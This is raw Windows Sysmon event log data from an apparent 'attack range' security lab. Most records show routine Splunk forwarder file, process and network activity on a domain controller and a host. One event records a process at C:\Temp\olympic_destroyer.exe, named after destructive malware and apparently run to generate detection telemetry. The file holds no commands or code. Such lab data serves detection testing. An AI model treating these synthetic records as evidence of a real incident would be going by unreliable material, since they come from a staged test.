11:15:03.753{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.753{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.753{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1737-6216-2307-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.753{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1737-6216-2307-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.754{C8EA50B7-1737-6216-2307-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:04.905{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17BF690FE6B82F281256679D4A7415B2,SHA256=F447F5FF6BB2FD301DEC9E76988814E7704D23C7AB0EF3D7BFE13D395D586BD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:04.815{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B6A02EAEA07CC61329E3E201AFBCBF7,SHA256=F09D2F0491B37C98C14AE0D05693AEC8FB10E04120BBBA8B84A9428C2ED0315D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.542{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49430-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:05.921{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2B9282C8EB4F557B10524E0258BCCD,SHA256=F8A57CDC71D037AFC65B0EF9353EB2B874E465D5B4E10B9349E4771A01ED0D36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:05.830{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47364135F205BD7516DEC516F375CDEA,SHA256=299B8126343949C5C06B0F4A6EE454D8D6386484A13B89AD87E3CC50B254BED2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.465{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49431-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.465{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49431-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:06.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42108C0E5840A93CF03FF6AC63E87E7F,SHA256=C132C380914E58EEDE61D0B25B71EAD7970F101ADB1DB681BF1766BCCDCC267E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:06.986{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FAA6112B7A0743DD2013D9607CDE8E6,SHA256=F73D82D65FE5A0086301AA305F4AFC5F14E572DF7A7B0076CEA0276C4CF231EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:02.671{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51627-false10.0.1.12-8000- 23542300x8000000000000000297228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:07.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47FFDA7846FD6A34E7E8941F9FD09DB,SHA256=10A5B17713AF870FB9FFAA187DA341F6C5A11BD708CB6637C2607A94437DC9C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:08.127{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC7DD182E600156024357317D5916CFD,SHA256=BDA0A118B2B13E14C7EA44FC58279A47BFFB0E657CF8C9F92855CDD74D6BCF23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:09.268{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D7836F5FC94B0FB254E4DC9A101BD0,SHA256=5C056731E1513065182885B443FE6EA9591631E83992F4280B34C59F0A37594B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:07.694{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49432-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:09.004{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725FD406097AD5A0683AB5E801834A26,SHA256=356BE1D16A445EF5D4ED1A69271A26006EF5641F7CC55B231C353E39F0C5DED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:10.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14B5B20D532B7F32882E394253C2CCF5,SHA256=5946CB9D5339173EF8AA1665900C73ADDAA3ABA66914F7E0BFC60BE8589322D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:10.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35928A076B633433EFBF685E263F6848,SHA256=E78003D87F080E3BC38F1273A2F115F1B2045EA36AE442E0623E0F7ED47841CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:11.361{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5191365C0F120B975C8893BE719508E1,SHA256=FF324CA3BEF145AD4BD5D7B2EF5F1823257018DB02A1C90A059F3A3260765C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:11.068{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE407D58DB6AD5997E5D7C416330A55A,SHA256=2B7FDD0ACA4852C3D19EC6CC6DE4D4D1A748FA9B6B475B6062CFF242DBF2E293,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:08.563{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51628-false10.0.1.12-8000- 23542300x8000000000000000221122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:12.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7F556BE23D827BC2812624C9954140E,SHA256=A22EF2EA956A25B5A2B511463168C085D62A623482BA60E3A9BFC07713A7A9E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:12.602{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:12.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F6A93DBCD6DD28751808F44DF4BD79,SHA256=B82444503AFF98332E44B31AB0ACDB84A9F8F14845F8424D4E631DB471246B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:13.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4068D2AA8A0D562E2166C52C3A8674,SHA256=F78BE4BC38EB311140DBB215489D317E210524B466912C34A554ABECCF08E93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:13.602{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E0C66419AE6FD0B065718680929BE786,SHA256=EF697828384722892E86D19E5584FD4F576A28EB31D7137188829065CA5A4E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:13.602{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E8E1F33508FF44F247ADF94ADDC24838,SHA256=473F13533DE8DD5C558429437D6152D3E19102356A6B8DCBDDCFE8B013CAB79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:13.087{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF66DAC517FC291959C9FCA818CE32B,SHA256=08B302D6A58DBBBF95B9F9D3D67A1B2CB884DD7CACDE6DB92D639F6540B6A7F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:14.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C667970DCC03E5745602305F8D5658,SHA256=1A21707AD5E1FB6AD8FC5A83FB93B8FF5603210391E1F8EF2273140E77A4BB96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:14.102{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E30FB5101008AAC8318BB069BC78BA14,SHA256=4D64889CCAE4B800F681BA652EDC45C394F2D73951653926CF8B4E11D3FF33EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:15.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F95C79FC421E89C001B61177D6EE90E,SHA256=59643B715F28624D55AEEB7E3EB19EA3FA90B056F4AFFBE6B31CEF1773E6519C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:13.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49434-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:15.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7313CFFF96FFDCCBC57F2B46007285A2,SHA256=D945050C71E214F050196DB61FF3B9153EFD60EE30CED7C78ADAFCC1B9CA35AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:16.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5094A1020C3F8F27626108CA6CB032A6,SHA256=7C742ED19E2003C709B83F351789A6B9341B94BC2518DCF240DBAC88FFA0A563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:16.132{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1204E9304E4B1620ED032675EAA36B,SHA256=B2E6CCCD52177349566410FD0E6F442B5E7C3446F0479AC66AC996E228C3D606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:17.674{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBD84493F4F789AE0D715E010AC55555,SHA256=B263C117E8E8DC1CAB81D06ED73BC9CD6A285EE90C49D1670E97B58BE3693377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:17.147{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=073F02EA61BFA534EF97D0207CD87EAC,SHA256=2F3DC51B96EDAC9FB60843C447561670097FDCDC965CF7934EB386ABECD6B0E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:14.500{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51629-false10.0.1.12-8000- 23542300x8000000000000000221129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:18.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C88D3B5318FAB11BCB7D487C5F883EB5,SHA256=9A117C73012DAE32181D6B30E7C335685A0922860A178560DDC5D0A3563714F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:18.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52F28EB63D7E73CFBBF5EB05586DD74,SHA256=4AF9206FA2143C1E779C0355969D644034627F4271D4CA965632C709F65BDE60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1747-6216-2507-000000003802}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 